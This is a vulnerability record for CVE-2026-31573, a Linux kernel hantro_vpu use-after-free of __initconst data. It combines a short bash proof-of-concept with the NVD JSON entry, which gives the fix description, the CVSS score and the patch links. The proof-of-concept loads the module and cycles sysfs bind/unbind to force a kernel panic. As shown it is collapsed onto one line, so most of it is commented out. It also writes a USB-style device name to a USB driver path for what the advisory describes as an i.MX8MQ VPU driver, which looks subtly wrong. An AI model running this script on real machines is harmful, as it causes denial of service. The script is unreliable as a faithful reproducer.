CVE-2026-31573

#!/bin/bash # PoC: Trigger kernel panic by loading the vulnerable module # This requires a vulnerable kernel version with the hantro_vpu driver. # Attempt to load the module (or trigger hardware probe) # On a system with affected hardware (i.MX8MQ VPU) modprobe hantro_vpu # Or if built-in, trigger device bind/unbind cycle echo "1-1" > /sys/bus/usb/drivers/hantro_vpu/unbind echo "1-1" > /sys/bus/usb/drivers/hantro_vpu/bind # Expected Result: Kernel Panic (Unable to handle kernel paging request)

{"cve": {"id": "CVE-2026-31573", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-04-24T15:16:31.857", "lastModified": "2026-04-27T20:29:52.667", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: verisilicon: Fix kernel panic due to __initconst misuse\n\nFix a kernel panic when probing the driver as a module:\n\n Unable to handle kernel paging request at virtual address\n ffffd9c18eb05000\n of_find_matching_node_and_match+0x5c/0x1a0\n hantro_probe+0x2f4/0x7d0 [hantro_vpu]\n\nThe imx8mq_vpu_shared_resources array is referenced by variant\nstructures through their shared_devices field. When built as a\nmodule, __initconst causes this data to be freed after module\ninit, but it's later accessed during probe, causing a page fault.\n\nThe imx8mq_vpu_shared_resources is referenced from non-init code,\nso keeping __initconst or __initconst_or_module here is wrong.\n\nDrop the __initconst annotation and let it live in the normal .rodata\nsection.\n\nA bug of __initconst called from regular non-init probe code\nleading to bugs during probe deferrals or during unbind-bind cycles."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19.6", "versionEndExcluding": "6.19.11", "matchCriteriaId": "1BFE33C3-C605-4CC2-9F15-3494BA78E2C9"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/1e7e9119cf9b0d8585b27653b1a6dc31397c252e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e8d97c270cb46a2a88739019d0f8547adc7d97da", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}